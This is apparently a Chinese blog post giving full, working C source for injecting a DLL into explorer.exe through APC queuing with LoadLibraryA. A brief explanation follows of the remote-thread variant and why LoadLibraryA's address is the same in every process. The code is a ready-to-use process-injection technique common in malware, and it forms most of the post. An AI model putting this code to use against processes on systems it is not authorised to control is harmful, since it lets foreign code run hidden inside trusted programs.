continue my dream
阿新 • • 發佈:2019-01-24
#include <windows.h> #include <stdio.h> #include <tlhelp32.h> #include "Winbase.h" typedef HANDLE (WINAPI *_OPENTHREAD)(DWORD,BOOL,DWORD); _OPENTHREAD OpenThread=(_OPENTHREAD)GetProcAddress(GetModuleHandle(("Kernel32.dll")),"OpenThread"); #define def_buf_size 1024 char szFullpath[def_buf_size]={0}; int GetProcessPid(char *pProcessName) { HANDLE handle; PROCESSENTRY32 pe; BOOL bRet; handle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); bRet=Process32First(handle,&pe); while (bRet) { if (strcmp(pProcessName,pe.szExeFile)==0) { return pe.th32ProcessID; } else { bRet=Process32Next(handle,&pe); } } return -1; } bool injectModulToProcess(DWORD dwProcessid) { HANDLE handle; LPVOID lpData; DWORD dwResult; bool bRet; handle=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessid); if (handle) { lpData=VirtualAllocEx(handle,NULL,sizeof(szFullpath)+1,MEM_COMMIT,PAGE_EXECUTE_READWRITE); if (lpData) { bRet=WriteProcessMemory(handle,lpData,(LPVOID)szFullpath,sizeof(szFullpath)+1,&dwResult); } CloseHandle(handle); } if (!bRet) { return false; } THREADENTRY32 te={sizeof(THREADENTRY32)}; HANDLE handleSnap=CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0); if (handleSnap== INVALID_HANDLE_VALUE) { return false; } bool bStat=false; if (Thread32First(handleSnap,&te)) { do { if (te.th32OwnerProcessID==dwProcessid) { HANDLE handleThread=OpenThread(THREAD_ALL_ACCESS, FALSE, te.th32ThreadID); if (handleThread) { dwResult=QueueUserAPC((PAPCFUNC)LoadLibraryA,handleThread,lpData); if (dwResult>0) { bStat=true; } CloseHandle(handleThread); } } } while (Thread32Next(handleSnap,&te)); } CloseHandle(handleSnap); return bStat; } int main() { GetCurrentDirectory(def_buf_size,szFullpath); strcat(szFullpath,"\\Dlltest.dll"); char szProcessname[64]="explorer.exe"; if (!injectModulToProcess(GetProcessPid(szProcessname))) { printf("%s注入失敗",szFullpath); } else { printf("%s注入成功",szFullpath); } return 0; }
提示:
所謂DLL注入就是將一個DLL放進某個程序的地址空間裡,讓它成為那個程序的一部分。要實現DLL注入,首先需要開啟目標程序。
hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | //允許遠端建立執行緒 PROCESS_VM_OPERATION | //允許遠端VM操作 PROCESS_VM_WRITE, //允許遠端VM寫 FALSE, dwRemoteProcessId ) 由於我們後面需要寫入遠端程序的記憶體地址空間並建立遠端執行緒,所以需要申請足夠的許可權(PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE)。OK,現在目標程序也認識pszLibFileRemote了,但是pfnStartAddr好像不好辦,我怎麼可能知道LoadLibraryA在目標程序中的地址呢?其實Windows為我們解決了這個問題,LoadLibraryA這個函式是在Kernel32.dll這個核心DLL裡的,而這個DLL很特殊,不管對於哪個程序,Windows總是把它載入到相同的地址上去。因此你的程序中LoadLibraryA的地址和目標程序中LoadLibraryA的地址是相同的(其實,這個DLL裡的所有函式都是如此)。至此,DLL注入結束了。